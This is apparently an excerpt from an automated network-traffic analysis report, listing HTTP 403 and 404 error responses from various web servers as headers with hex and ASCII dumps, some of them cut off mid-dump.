0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:56:16 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:16 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Lu2Ir%2BS%2F%2BkC%2FwGjIil3db79w5PJPdx3zPU%2BpoStszHiRrO%2FM1%2FSQiENo4%2Buj49Cj0Jn3lN8efMRWcuc7NINS3ZSmX%2FSuBu2eXHG0g1qcVYNB5EFVIVjd3KWKPRtBbWQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a826cd692c25-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:16 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WsRS5kBOE4jMWIcTcJlmwBpXYnyUwqTScd63J%2FKLOr0FPAKQYCb8jJcY2BST1wlVKpTGs%2B8%2FY5OdwjtTIHPA1QTV64ujrmr95UzH8fGTrVAV00OemAKo0cqeriIaEvc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a8270db92c25-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:56:16 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: s1ayunMf/mCMGTLUGData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:16 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:56:16 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:56:16 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:16 GMTServer: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_uploader/3.2.0Content-Length: 202Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zsHwwFHpvt1pZOYb2YnvXEoRdsBauPDf2uRF4EBtFTTkDeG47EQcmapzTynqRZIK1Y7U229AocyvRq1OrN9qkC9bqbBaKYfHKFUtYZMvUb5RqoBqao8JWmec9%2FF1zz0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a8284bf330f6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:17 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:17 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:17 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:56:17 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 03:20:42 GMTAccept-Ranges: bytesContent-Length: 1260Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Fri, 10 Mar 2023 06:56:17 GMTX-Zen-Fury: b6bd8d722d045b526c69cc187c60552aaca035baCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Server: ZENEDGEX-Cache-Status: Data Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 38 37 39 36 22 2c 20 31 36 37 38 34 33 31 33 33 34 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 35 32 31 38 37 36 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 35 32 31 38 37 36 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC8796", 1678431334, 1, 0, 60); })()</script><script type="text/javascript" async="async" 